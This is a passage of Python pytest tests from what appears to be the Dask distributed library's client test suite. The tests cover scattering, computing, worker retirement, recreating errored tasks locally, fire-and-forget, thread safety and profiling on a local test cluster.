L1 = [delayed(inc)(i) for i in range(4)]
total = delayed(sum)(L1)
L2 = [delayed(add)(i, total) for i in L1]
out = e.compute(
L1 + L2 + [total],
workers=[a.address, b.address],
allow_other_workers=True,
)
await wait(out)
for v in L1 + L2 + [total]:
assert s.worker_restrictions[v.key] == {a.address, b.address}
assert not any(c.address in r for r in s.worker_restrictions)
assert s.loose_restrictions == {total.key} | {v.key for v in L1 + L2}
@gen_cluster(client=True)
async def test_compute_nested_containers(c, s, a, b):
da = pytest.importorskip("dask.array")
np = pytest.importorskip("numpy")
x = da.ones(10, chunks=(5,)) + 1
future = c.compute({"x": [x], "y": 123})
result = await future
assert isinstance(result, dict)
assert (result["x"][0] == np.ones(10) + 1).all()
assert result["y"] == 123
@gen_cluster(client=True)
async def test_scatter_type(c, s, a, b):
    """Futures returned by scatter record the Python type of their payload."""
    [future] = await c.scatter([1])
    assert future.type == int

    scattered = await c.scatter({"x": 1.0})
    assert scattered["x"].type == float
@gen_cluster(client=True)
async def test_retire_workers_2(c, s, a, b):
[x] = await c.scatter([1], workers=a.address)
await s.retire_workers(workers=[a.address])
assert b.data == {x.key: 1}
assert s.who_has == {x.key: {b.address}}
assert s.has_what == {b.address: {x.key}}
assert a.address not in s.workers
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 10)
async def test_retire_many_workers(c, s, *workers):
futures = await c.scatter(list(range(100)))
await s.retire_workers(workers=[w.address for w in workers[:7]])
results = await c.gather(futures)
assert results == list(range(100))
while len(s.workers) != 3:
await asyncio.sleep(0.01)
assert len(s.has_what) == len(s.nthreads) == 3
assert all(future.done() for future in futures)
assert all(s.tasks[future.key].state == "memory" for future in futures)
for w, keys in s.has_what.items():
assert 15 < len(keys) < 50
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 3)] * 2,
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_weight_occupancy_against_data_movement(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0, z=0):
sleep(0.01)
return x
y = await c.scatter([[1, 2, 3, 4]], workers=[a.address])
z = await c.scatter([1], workers=[b.address])
futures = c.map(f, [1, 2, 3, 4], y=y, z=z)
await wait(futures)
assert sum(f.key in a.data for f in futures) >= 2
assert sum(f.key in b.data for f in futures) >= 1
@gen_cluster(
client=True,
nthreads=[("127.0.0.1", 1), ("127.0.0.1", 10)],
config={"distributed.scheduler.default-task-durations": {"f": "10ms"}},
)
async def test_distribute_tasks_by_nthreads(c, s, a, b):
s.extensions["stealing"]._pc.callback_time = 1000000
def f(x, y=0):
sleep(0.01)
return x
y = await c.scatter([1], broadcast=True)
futures = c.map(f, range(20), y=y)
await wait(futures)
assert len(b.data) > 2 * len(a.data)
@gen_cluster(client=True, clean_kwargs={"threads": False})
async def test_add_done_callback(c, s, a, b):
S = set()
def f(future):
future.add_done_callback(g)
def g(future):
S.add((future.key, future.status))
u = c.submit(inc, 1, key="u")
v = c.submit(throws, "hello", key="v")
w = c.submit(slowinc, 2, delay=0.3, key="w")
x = c.submit(inc, 3, key="x")
u.add_done_callback(f)
v.add_done_callback(f)
w.add_done_callback(f)
await wait((u, v, w, x))
x.add_done_callback(f)
while len(S) < 4:
await asyncio.sleep(0.01)
assert S == {(f.key, f.status) for f in (u, v, w, x)}
@gen_cluster(client=True)
async def test_normalize_collection(c, s, a, b):
x = delayed(inc)(1)
y = delayed(inc)(x)
z = delayed(inc)(y)
yy = c.persist(y)
zz = c.normalize_collection(z)
assert len(z.dask) == len(y.dask) + 1
assert isinstance(zz.dask[y.key], Future)
assert len(zz.dask) < len(z.dask)
@gen_cluster(client=True)
async def test_normalize_collection_dask_array(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=(5,))
y = x + 1
yy = c.persist(y)
z = y.sum()
zdsk = dict(z.dask)
zz = c.normalize_collection(z)
assert z.dask == zdsk # do not mutate input
assert len(z.dask) > len(zz.dask)
assert any(isinstance(v, Future) for v in zz.dask.values())
for k, v in yy.dask.items():
assert zz.dask[k].key == v.key
result1 = await c.compute(z)
result2 = await c.compute(zz)
assert result1 == result2
@pytest.mark.slow
def test_normalize_collection_with_released_futures(c):
da = pytest.importorskip("dask.array")
x = da.arange(2 ** 20, chunks=2 ** 10)
y = x.persist()
wait(y)
sol = y.sum().compute()
# Start releasing futures
del y
# Try to reuse futures. Previously this was a race condition,
# and the call to `.compute()` would error out due to missing
# futures on the scheduler at compute time.
normalized = c.normalize_collection(x)
res = normalized.sum().compute()
assert res == sol
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
@gen_cluster(client=True)
async def test_auto_normalize_collection(c, s, a, b):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
assert len(x.dask) == 2
with dask.config.set(optimizations=[c._optimize_insert_futures]):
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
await wait(yy)
start = time()
future = c.compute(y.sum())
await future
end = time()
assert end - start < 1
start = time()
z = c.persist(y + 1)
await wait(z)
end = time()
assert end - start < 1
@pytest.mark.xfail(reason="https://github.com/dask/distributed/issues/4404")
def test_auto_normalize_collection_sync(c):
da = pytest.importorskip("dask.array")
x = da.ones(10, chunks=5)
y = x.map_blocks(slowinc, delay=1, dtype=x.dtype)
yy = c.persist(y)
wait(yy)
with dask.config.set(optimizations=[c._optimize_insert_futures]):
start = time()
y.sum().compute()
end = time()
assert end - start < 1
def assert_no_data_loss(scheduler):
    """Scan the scheduler's transition log and fail if any task that went
    memory -> released was simultaneously recommended back to 'waiting' —
    that combination signals lost data that must be recomputed.
    """
    for entry in scheduler.transition_log:
        key, start, finish, recommendations = entry[0], entry[1], entry[2], entry[3]
        if (start, finish) != ("memory", "released"):
            continue
        for rec_key, rec_state in recommendations.items():
            assert not (rec_key == key and rec_state == "waiting")
@gen_cluster(client=True)
async def test_interleave_computations(c, s, a, b):
import distributed
distributed.g = s
xs = [delayed(slowinc)(i, delay=0.02) for i in range(30)]
ys = [delayed(slowdec)(x, delay=0.02) for x in xs]
zs = [delayed(slowadd)(x, y, delay=0.02) for x, y in zip(xs, ys)]
total = delayed(sum)(zs)
future = c.compute(total)
done = ("memory", "released")
await asyncio.sleep(0.1)
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
assert_no_data_loss(s)
@pytest.mark.skip(reason="Now prefer first-in-first-out")
@gen_cluster(client=True)
async def test_interleave_computations_map(c, s, a, b):
xs = c.map(slowinc, range(30), delay=0.02)
ys = c.map(slowdec, xs, delay=0.02)
zs = c.map(slowadd, xs, ys, delay=0.02)
done = ("memory", "released")
x_keys = [x.key for x in xs]
y_keys = [y.key for y in ys]
z_keys = [z.key for z in zs]
while not s.tasks or any(w.processing for w in s.workers.values()):
await asyncio.sleep(0.05)
x_done = sum(state in done for state in s.get_task_status(keys=x_keys).values())
y_done = sum(state in done for state in s.get_task_status(keys=y_keys).values())
z_done = sum(state in done for state in s.get_task_status(keys=z_keys).values())
assert x_done >= y_done >= z_done
assert x_done < y_done + 10
assert y_done < z_done + 10
@gen_cluster(client=True)
async def test_scatter_dict_workers(c, s, a, b):
    """A dict scattered to a set of workers lands on at least one of them."""
    await c.scatter({"a": 10}, workers=[a.address, b.address])
    assert any("a" in worker.data for worker in (a, b))
@pytest.mark.slow
@gen_test()
async def test_client_timeout():
"""`await Client(...)` keeps retrying for 10 seconds if it can't find the Scheduler
straight away
"""
c = Client("127.0.0.1:57484", asynchronous=True)
client_start_fut = asyncio.ensure_future(c)
await asyncio.sleep(4)
async with Scheduler(port=57484, dashboard_address=":0"):
await client_start_fut
assert await c.run_on_scheduler(lambda: 123) == 123
await c.close()
@gen_cluster(client=True)
async def test_submit_list_kwargs(c, s, a, b):
    """A list of futures passed as a keyword argument to submit is resolved
    to its concrete values before the task runs."""
    futures = await c.scatter([1, 2, 3])

    def f(L=None):
        return sum(L)

    result = await c.submit(f, L=futures)
    assert result == 1 + 2 + 3
@gen_cluster(client=True)
async def test_map_list_kwargs(c, s, a, b):
    """A list of futures passed as a keyword argument to map is resolved for
    every mapped call."""
    scattered = await c.scatter([1, 2, 3])

    def f(i, L=None):
        return i + sum(L)

    results = await c.gather(c.map(f, range(10), L=scattered))
    assert results == [i + 6 for i in range(10)]
@gen_cluster(client=True)
async def test_dont_clear_waiting_data(c, s, a, b):
    """Scattered data still needed by a dependent task must not be released."""
    x = await c.scatter(1)
    y = c.submit(slowinc, x, delay=0.5)
    while y.key not in s.tasks:
        await asyncio.sleep(0.01)
    key = x.key
    # Drop the client's reference; y still depends on the scattered data
    del x
    for i in range(5):
        assert s.waiting_data[key]
        await asyncio.sleep(0)
@gen_cluster(client=True)
async def test_recreate_error_delayed(c, s, a, b):
    """The errored task (div by zero) of a delayed graph can be rebuilt locally."""
    x0 = delayed(dec)(2)
    y0 = delayed(dec)(1)
    x = delayed(div)(1, x0)
    y = delayed(div)(1, y0)  # dec(1) == 0, so this division fails remotely
    tot = delayed(sum)(x, y)
    f = c.compute(tot)
    assert f.status == "pending"
    error_f = await c._get_errored_future(f)
    function, args, kwargs = await c._get_components_from_future(error_f)
    assert f.status == "error"
    assert function.__name__ == "div"
    assert args == (1, 0)
    with pytest.raises(ZeroDivisionError):
        function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_futures(c, s, a, b):
    """Same as test_recreate_error_delayed but built from plain futures."""
    x0 = c.submit(dec, 2)
    y0 = c.submit(dec, 1)
    x = c.submit(div, 1, x0)
    y = c.submit(div, 1, y0)
    tot = c.submit(sum, x, y)
    f = c.compute(tot)
    assert f.status == "pending"
    error_f = await c._get_errored_future(f)
    function, args, kwargs = await c._get_components_from_future(error_f)
    assert f.status == "error"
    assert function.__name__ == "div"
    assert args == (1, 0)
    with pytest.raises(ZeroDivisionError):
        function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_collection(c, s, a, b):
    """Errored tasks inside bag and dataframe collections can be recreated locally."""
    b = db.range(10, npartitions=4)
    b = b.map(lambda x: 1 / x)  # fails on the partition containing 0
    b = b.persist()
    f = c.compute(b)
    error_f = await c._get_errored_future(f)
    function, args, kwargs = await c._get_components_from_future(error_f)
    with pytest.raises(ZeroDivisionError):
        function(*args, **kwargs)
    dd = pytest.importorskip("dask.dataframe")
    import pandas as pd
    df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
    def make_err(x):
        # because pandas would happily work with NaN
        if x == 0:
            raise ValueError
        return x
    df2 = df.a.map(make_err)
    f = c.compute(df2)
    error_f = await c._get_errored_future(f)
    function, args, kwargs = await c._get_components_from_future(error_f)
    with pytest.raises(ValueError):
        function(*args, **kwargs)
    # with persist
    df3 = c.persist(df2)
    error_f = await c._get_errored_future(df3)
    function, args, kwargs = await c._get_components_from_future(error_f)
    with pytest.raises(ValueError):
        function(*args, **kwargs)
@gen_cluster(client=True)
async def test_recreate_error_array(c, s, a, b):
    """Recreated components of a failing array task carry the real array args."""
    da = pytest.importorskip("dask.array")
    pytest.importorskip("scipy")
    z = (da.linalg.inv(da.zeros((10, 10), chunks=10)) + 1).sum()
    zz = z.persist()
    error_f = await c._get_errored_future(zz)
    function, args, kwargs = await c._get_components_from_future(error_f)
    assert "0.,0.,0." in str(args).replace(" ", "")  # args contain actual arrays
def test_recreate_error_sync(c):
    """recreate_error_locally re-raises the remote exception in this process."""
    x0 = c.submit(dec, 2)
    y0 = c.submit(dec, 1)
    x = c.submit(div, 1, x0)
    y = c.submit(div, 1, y0)
    tot = c.submit(sum, x, y)
    f = c.compute(tot)
    with pytest.raises(ZeroDivisionError):
        c.recreate_error_locally(f)
    assert f.status == "error"
def test_recreate_error_not_error(c):
    """recreate_error_locally on a successful future raises ValueError."""
    f = c.submit(dec, 2)
    with pytest.raises(ValueError, match="No errored futures passed"):
        c.recreate_error_locally(f)
@gen_cluster(client=True)
async def test_recreate_task_delayed(c, s, a, b):
    """_get_components_from_future rebuilds a finished delayed task for local replay."""
    x0 = delayed(dec)(2)
    y0 = delayed(dec)(2)
    x = delayed(div)(1, x0)
    y = delayed(div)(1, y0)
    tot = delayed(sum)([x, y])
    f = c.compute(tot)
    assert f.status == "pending"
    function, args, kwargs = await c._get_components_from_future(f)
    assert f.status == "finished"
    assert function.__name__ == "sum"
    assert args == ([1, 1],)
    assert function(*args, **kwargs) == 2
@gen_cluster(client=True)
async def test_recreate_task_futures(c, s, a, b):
    """Same as test_recreate_task_delayed but built from plain futures."""
    x0 = c.submit(dec, 2)
    y0 = c.submit(dec, 2)
    x = c.submit(div, 1, x0)
    y = c.submit(div, 1, y0)
    tot = c.submit(sum, [x, y])
    f = c.compute(tot)
    assert f.status == "pending"
    function, args, kwargs = await c._get_components_from_future(f)
    assert f.status == "finished"
    assert function.__name__ == "sum"
    assert args == ([1, 1],)
    assert function(*args, **kwargs) == 2
@gen_cluster(client=True)
async def test_recreate_task_collection(c, s, a, b):
    """Finished tasks from bag/dataframe collections can be replayed locally."""
    b = db.range(10, npartitions=4)
    b = b.map(lambda x: int(3628800 / (x + 1)))
    b = b.persist()
    f = c.compute(b)
    function, args, kwargs = await c._get_components_from_future(f)
    assert function(*args, **kwargs) == [
        3628800,
        1814400,
        1209600,
        907200,
        725760,
        604800,
        518400,
        453600,
        403200,
        362880,
    ]
    dd = pytest.importorskip("dask.dataframe")
    import pandas as pd
    df = dd.from_pandas(pd.DataFrame({"a": [0, 1, 2, 3, 4]}), chunksize=2)
    df2 = df.a.map(lambda x: x + 1)
    f = c.compute(df2)
    function, args, kwargs = await c._get_components_from_future(f)
    expected = pd.DataFrame({"a": [1, 2, 3, 4, 5]})["a"]
    assert function(*args, **kwargs).equals(expected)
    # with persist
    df3 = c.persist(df2)
    # recreate_task_locally only works with futures
    with pytest.raises(AttributeError):
        function, args, kwargs = await c._get_components_from_future(df3)
    f = c.compute(df3)
    function, args, kwargs = await c._get_components_from_future(f)
    assert function(*args, **kwargs).equals(expected)
@gen_cluster(client=True)
async def test_recreate_task_array(c, s, a, b):
    """Replaying a finished dask.array task locally returns the computed value."""
    da = pytest.importorskip("dask.array")
    z = (da.zeros((10, 10), chunks=10) + 1).sum()
    f = c.compute(z)
    function, args, kwargs = await c._get_components_from_future(f)
    assert function(*args, **kwargs) == 100
def test_recreate_task_sync(c):
    """recreate_task_locally recomputes a finished future in this process."""
    x0 = c.submit(dec, 2)
    y0 = c.submit(dec, 2)
    x = c.submit(div, 1, x0)
    y = c.submit(div, 1, y0)
    tot = c.submit(sum, [x, y])
    f = c.compute(tot)
    assert c.recreate_task_locally(f) == 2
@gen_cluster(client=True)
async def test_retire_workers(c, s, a, b):
    """Client.retire_workers removes the worker from the scheduler and closes it."""
    assert set(s.workers) == {a.address, b.address}
    await c.retire_workers(workers=[a.address], close_workers=True)
    assert set(s.workers) == {b.address}
    while a.status != Status.closed:
        await asyncio.sleep(0.01)
# Sentinel exception type used by the (de)serialization robustness tests below.
class MyException(Exception):
    pass
@gen_cluster(client=True)
async def test_robust_unserializable(c, s, a, b):
    """An argument that fails to pickle raises locally without harming the cluster."""
    class Foo:
        def __getstate__(self):
            raise MyException()
    with pytest.raises(MyException):
        future = c.submit(identity, Foo())
    # The cluster remains fully usable afterwards
    futures = c.map(inc, range(10))
    results = await c.gather(futures)
    assert results == list(map(inc, range(10)))
    assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable(c, s, a, b):
    """An argument that fails to unpickle on the worker errs only that task."""
    class Foo:
        def __getstate__(self):
            return 1
        def __setstate__(self, state):
            raise MyException("hello")
    future = c.submit(identity, Foo())
    with pytest.raises(MyException):
        await future
    futures = c.map(inc, range(10))
    results = await c.gather(futures)
    assert results == list(map(inc, range(10)))
    assert a.data and b.data
@gen_cluster(client=True)
async def test_robust_undeserializable_function(c, s, a, b):
    """A callable that fails to unpickle on the worker errs only that task."""
    class Foo:
        def __getstate__(self):
            return 1
        def __setstate__(self, state):
            raise MyException("hello")
        def __call__(self, *args):
            return 1
    future = c.submit(Foo(), 1)
    with pytest.raises(MyException):
        await future
    futures = c.map(inc, range(10))
    results = await c.gather(futures)
    assert results == list(map(inc, range(10)))
    assert a.data and b.data
@gen_cluster(client=True)
async def test_fire_and_forget(c, s, a, b):
    """fire_and_forget keeps a task alive with no client reference, then cleans up."""
    future = c.submit(slowinc, 1, delay=0.1)
    import distributed
    def f(x):
        distributed.foo = 123
    try:
        fire_and_forget(c.submit(f, future))
        while not hasattr(distributed, "foo"):
            await asyncio.sleep(0.01)
        assert distributed.foo == 123
    finally:
        del distributed.foo
    while len(s.tasks) > 1:
        await asyncio.sleep(0.01)
    # Only the explicitly held future remains tracked afterwards
    assert set(s.who_wants) == {future.key}
    assert set(s.tasks) == {future.key}
@gen_cluster(client=True)
async def test_fire_and_forget_err(c, s, a, b):
    """An erred fire-and-forget task is forgotten by the scheduler promptly."""
    fire_and_forget(c.submit(div, 1, 0))
    await asyncio.sleep(0.1)
    # erred task should clear out quickly
    start = time()
    while s.tasks:
        await asyncio.sleep(0.01)
    assert time() < start + 1
def test_quiet_client_close(loop):
    """Closing a busy client mid-computation should not spam the logs."""
    with captured_logger(logging.getLogger("distributed")) as logger:
        with Client(
            loop=loop,
            processes=False,
            dashboard_address=":0",
            threads_per_worker=4,
        ) as c:
            futures = c.map(slowinc, range(1000), delay=0.01)
            sleep(0.200)  # stop part-way
        sleep(0.1)  # let things settle
    out = logger.getvalue()
    lines = out.strip().split("\n")
    assert len(lines) <= 2
    for line in lines:
        assert (
            not line
            or "Reconnecting" in line
            or "garbage" in line
            or set(line) == {"-"}
        ), line
@pytest.mark.slow
def test_quiet_client_close_when_cluster_is_closed_before_client(loop):
    """Closing the cluster before its client must not log CancelledError."""
    with captured_logger(logging.getLogger("tornado.application")) as logger:
        cluster = LocalCluster(loop=loop, n_workers=1, dashboard_address=":0")
        client = Client(cluster, loop=loop)
        cluster.close()
        client.close()
    out = logger.getvalue()
    assert "CancelledError" not in out
@gen_cluster()
async def test_close(s, a, b):
    """Client.close deregisters the client and releases its tasks on the scheduler."""
    c = await Client(s.address, asynchronous=True)
    future = c.submit(inc, 1)
    await wait(future)
    assert c.id in s.wants_what
    await c.close()
    while c.id in s.wants_what or s.tasks:
        await asyncio.sleep(0.01)
def test_threadsafe(c):
    """Client.submit/gather must be safe to call from many threads at once."""
    def f(_):
        d = deque(maxlen=50)
        for i in range(100):
            future = c.submit(inc, random.randint(0, 100))
            d.append(future)
            sleep(0.001)
        c.gather(list(d))
        total = c.submit(sum, list(d))
        return total.result()
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(20) as e:
        results = list(e.map(f, range(20)))
    assert results and all(results)
    del results
@pytest.mark.slow
def test_threadsafe_get(c):
    """Concurrent .compute() calls on collections from many threads must be safe."""
    da = pytest.importorskip("dask.array")
    x = da.arange(100, chunks=(10,))
    def f(_):
        total = 0
        for i in range(20):
            total += (x + random.randint(0, 20)).sum().compute()
            sleep(0.001)
        return total
    from concurrent.futures import ThreadPoolExecutor
    with ThreadPoolExecutor(30) as e:
        results = list(e.map(f, range(30)))
    assert results and all(results)
@pytest.mark.slow
def test_threadsafe_compute(c):
    """Client.compute must be safe to call concurrently from many threads.

    Each thread repeatedly builds a small dask.array expression, computes it
    through the shared client, and accumulates the results; an internal race
    would surface as an exception or a falsy total.
    """
    da = pytest.importorskip("dask.array")
    x = da.arange(100, chunks=(10,))
    def f(_):
        total = 0
        for i in range(20):
            future = c.compute((x + random.randint(0, 20)).sum())
            total += future.result()
            sleep(0.001)
        return total
    from concurrent.futures import ThreadPoolExecutor
    # Use the executor as a context manager so its 30 worker threads are
    # joined even if a compute call raises.  The previous version never shut
    # the pool down, leaking threads into subsequent tests (the sibling
    # test_threadsafe/test_threadsafe_get already use `with`).
    with ThreadPoolExecutor(30) as e:
        results = list(e.map(f, range(30)))
    assert results and all(results)
@gen_cluster(client=True)
async def test_identity(c, s, a, b):
    """Client/worker/scheduler ids are prefixed with their role name."""
    assert c.id.lower().startswith("client")
    assert a.id.lower().startswith("worker")
    assert b.id.lower().startswith("worker")
    assert s.id.lower().startswith("scheduler")
@gen_cluster(client=True, nthreads=[("127.0.0.1", 4)] * 2)
async def test_get_client(c, s, a, b):
    """get_client() returns the local client here and a worker client inside tasks."""
    assert get_client() is c
    assert c.asynchronous
    def f(x):
        client = get_client()
        future = client.submit(inc, x)
        import distributed
        # The worker-side client is synchronous and is the same object we stashed
        assert not client.asynchronous
        assert client is distributed.tmp_client
        return future.result()
    import distributed
    distributed.tmp_client = c
    try:
        futures = c.map(f, range(5))
        results = await c.gather(futures)
        assert results == list(map(inc, range(5)))
    finally:
        del distributed.tmp_client
def test_get_client_no_cluster():
    """get_client() with no cluster and no address raises a clear ValueError."""
    # Clean up any global workers added by other tests. This test requires that
    # there are no global workers.
    Worker._instances.clear()
    msg = "No global client found and no address provided"
    with pytest.raises(ValueError, match=fr"^{msg}$"):
        get_client()
@gen_cluster(client=True)
async def test_serialize_collections(c, s, a, b):
    """Persisted collections can be passed to submit and rebuilt on the worker."""
    da = pytest.importorskip("dask.array")
    x = da.arange(10, chunks=(5,)).persist()
    def f(x):
        assert isinstance(x, da.Array)
        return x.sum().compute()
    future = c.submit(f, x)
    result = await future
    assert result == sum(range(10))
@gen_cluster(client=True, nthreads=[("127.0.0.1", 1)] * 1)
async def test_secede_simple(c, s, a):
    """A seceded task can wait on work it submitted, even on a 1-thread worker."""
    def f():
        client = get_client()
        secede()
        return client.submit(inc, 1).result()
    result = await c.submit(f)
    assert result == 2
@gen_cluster(client=True)
async def test_secede_balances(c, s, a, b):
    """Ensure that tasks scheduled from a seceded thread can be scheduled
    elsewhere"""
    def f(x):
        client = get_client()
        secede()
        futures = client.map(inc, range(10), pure=False)
        total = client.submit(sum, futures).result()
        return total
    futures = c.map(f, range(10), workers=[a.address])
    results = await c.gather(futures)
    # We dispatch 10 tasks and every task generates 11 more tasks
    # 10 * 11 + 10
    assert a.executed_count + b.executed_count == 120
    assert a.executed_count >= 10
    assert b.executed_count > 0
    assert results == [sum(map(inc, range(10)))] * 10
@gen_cluster(client=True)
async def test_sub_submit_priority(c, s, a, b):
    """Tasks submitted from within a running task are prioritized over the parent."""
    def func():
        client = get_client()
        f = client.submit(slowinc, 1, delay=0.5, key="slowinc")
        client.gather(f)
    future = c.submit(func, key="f")
    while len(s.tasks) != 2:
        await asyncio.sleep(0.001)
    # lower values schedule first
    assert s.tasks["f"].priority > s.tasks["slowinc"].priority, (
        s.tasks["f"].priority,
        s.tasks["slowinc"].priority,
    )
def test_get_client_sync(c, s, a, b):
    """get_worker()/get_client() resolve correctly inside Client.run calls."""
    results = c.run(lambda: get_worker().scheduler.address)
    assert results == {w["address"]: s["address"] for w in [a, b]}
    results = c.run(lambda: get_client().scheduler.address)
    assert results == {w["address"]: s["address"] for w in [a, b]}
@gen_cluster(client=True)
async def test_serialize_collections_of_futures(c, s, a, b):
    """A persisted dataframe survives a scatter/gather round-trip as a future."""
    pd = pytest.importorskip("pandas")
    dd = pytest.importorskip("dask.dataframe")
    from dask.dataframe.utils import assert_eq
    df = pd.DataFrame({"x": [1, 2, 3]})
    ddf = dd.from_pandas(df, npartitions=2).persist()
    future = await c.scatter(ddf)
    ddf2 = await future
    df2 = await c.compute(ddf2)
    assert_eq(df, df2)
def test_serialize_collections_of_futures_sync(c):
    """Synchronous variant of scattering a persisted dataframe as a future."""
    pd = pytest.importorskip("pandas")
    dd = pytest.importorskip("dask.dataframe")
    from dask.dataframe.utils import assert_eq
    df = pd.DataFrame({"x": [1, 2, 3]})
    ddf = dd.from_pandas(df, npartitions=2).persist()
    future = c.scatter(ddf)
    result = future.result()
    assert_eq(result.compute(), df)
    assert future.type == dd.DataFrame
    assert c.submit(lambda x, y: assert_eq(x.compute(), y), future, df).result()
def _dynamic_workload(x, delay=0.01):
    # Recursively submits more work from inside a running task; exercised by
    # the test_dynamic_workloads_sync* tests below.
    if delay == "random":
        sleep(random.random() / 2)
    else:
        sleep(delay)
    if x > 4:
        return 4
    # Free the worker thread before blocking on child tasks
    secede()
    client = get_client()
    futures = client.map(
        _dynamic_workload, [x + i + 1 for i in range(2)], pure=False, delay=delay
    )
    total = client.submit(sum, futures)
    return total.result()
def test_dynamic_workloads_sync(c):
    """Tasks that spawn further tasks complete correctly with a fixed delay."""
    future = c.submit(_dynamic_workload, 0, delay=0.02)
    assert future.result(timeout=20) == 52
@pytest.mark.slow
def test_dynamic_workloads_sync_random(c):
    """Same as test_dynamic_workloads_sync but with randomized per-task delays."""
    future = c.submit(_dynamic_workload, 0, delay="random")
    assert future.result(timeout=20) == 52
@pytest.mark.xfail(COMPILED, reason="Fails with cythonized scheduler")
@gen_cluster(client=True)
async def test_bytes_keys(c, s, a, b):
    """bytes task keys are preserved end to end."""
    key = b"inc-123"
    future = c.submit(inc, 1, key=key)
    result = await future
    assert type(future.key) is bytes
    assert set(s.tasks) == {key}
    assert key in a.data or key in b.data
    assert result == 2
@gen_cluster(client=True)
async def test_unicode_ascii_keys(c, s, a, b):
    """ASCII str task keys are preserved end to end."""
    uni_type = str
    key = "inc-123"
    future = c.submit(inc, 1, key=key)
    result = await future
    assert type(future.key) is uni_type
    assert set(s.tasks) == {key}
    assert key in a.data or key in b.data
    assert result == 2
@gen_cluster(client=True)
async def test_unicode_keys(c, s, a, b):
    """Non-ASCII str keys work for submit, chained submit, and scatter."""
    uni_type = str
    key = "inc-123\u03bc"
    future = c.submit(inc, 1, key=key)
    result = await future
    assert type(future.key) is uni_type
    assert set(s.tasks) == {key}
    assert key in a.data or key in b.data
    assert result == 2
    future2 = c.submit(inc, future)
    result2 = await future2
    assert result2 == 3
    future3 = await c.scatter({"data-123": 123})
    result3 = await future3["data-123"]
    assert result3 == 123
def test_use_synchronous_client_in_async_context(loop, c):
    """A synchronous client still works when awaited inside a coroutine via sync()."""
    async def f():
        x = await c.scatter(123)
        y = c.submit(inc, x)
        z = await c.gather(y)
        return z
    z = sync(loop, f)
    assert z == 124
def test_quiet_quit_when_cluster_leaves(loop_in_thread):
    """Abruptly closing the cluster under a live client should log nothing on comm."""
    loop = loop_in_thread
    with LocalCluster(loop=loop, dashboard_address=":0", silence_logs=False) as cluster:
        with captured_logger("distributed.comm") as sio:
            with Client(cluster, loop=loop) as client:
                futures = client.map(lambda x: x + 1, range(10))
                sleep(0.05)
                cluster.close()
                sleep(0.05)
        text = sio.getvalue()
        assert not text
def test_warn_executor(loop, s, a, b):
    """The deprecated Executor alias emits a warning pointing at Client."""
    with warnings.catch_warnings(record=True) as record:
        with Executor(s["address"], loop=loop) as c:
            pass
    assert any("Client" in str(r.message) for r in record)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_future(c, s, a, b):
    """call_stack for a single future reports only the worker executing it."""
    x = c.submit(slowdec, 1, delay=0.5)
    future = c.submit(slowinc, 1, delay=0.5)
    await asyncio.sleep(0.1)
    results = await asyncio.gather(
        c.call_stack(future), c.call_stack(keys=[future.key])
    )
    assert all(list(first(result.values())) == [future.key] for result in results)
    assert results[0] == results[1]
    result = results[0]
    # Work out which worker is actually executing the slowinc task
    ts = a.tasks.get(future.key)
    if ts is not None and ts.state == "executing":
        w = a
    else:
        w = b
    assert list(result) == [w.address]
    assert list(result[w.address]) == [future.key]
    assert "slowinc" in str(result)
    assert "slowdec" not in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_all(c, s, a, b):
    """call_stack with no arguments reports every currently executing task."""
    future = c.submit(slowinc, 1, delay=0.8)
    while not a.executing_count and not b.executing_count:
        await asyncio.sleep(0.01)
    result = await c.call_stack()
    w = a if a.executing_count else b
    assert list(result) == [w.address]
    assert list(result[w.address]) == [future.key]
    assert "slowinc" in str(result)
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections(c, s, a, b):
    """call_stack accepts a persisting collection as its argument."""
    da = pytest.importorskip("dask.array")
    x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
    while not a.executing_count and not b.executing_count:
        await asyncio.sleep(0.001)
    result = await c.call_stack(x)
    assert result
@gen_cluster([("127.0.0.1", 4)] * 2, client=True)
async def test_call_stack_collections_all(c, s, a, b):
    """call_stack() with no argument also sees tasks from collections."""
    da = pytest.importorskip("dask.array")
    x = da.random.random(100, chunks=(10,)).map_blocks(slowinc, delay=0.5).persist()
    while not a.executing_count and not b.executing_count:
        await asyncio.sleep(0.001)
    result = await c.call_stack()
    assert result
@pytest.mark.flaky(condition=WINDOWS, reruns=10, reruns_delay=5)
@gen_cluster(client=True, worker_kwargs={"profile_cycle_interval": "100ms"})
async def test_profile(c, s, a, b):
    """Client.profile respects time windows and per-worker filtering."""
    futures = c.map(slowinc, range(10), delay=0.05, workers=a.address)
    await wait(futures)
    # A window entirely in the future contains no samples
    x = await c.profile(start=time() + 10, stop=time() + 20)
    assert not x["count"]
    x = await c.profile(start=0, stop=time())
    assert (
        x["count"]
        == sum(p["count"] for _, p in a.profile_history) + a.profile_recent["count"]
    )
    y = await c.profile(start=time() - 0.300, stop=time())
    assert 0 < y["count"] < x["count"]
    # All work ran on worker a, so b's profile must be empty
    assert not any(p["count"] for _, p in b.profile_history)
    result = await c.profile(workers=b.address)
    assert not result["count"]
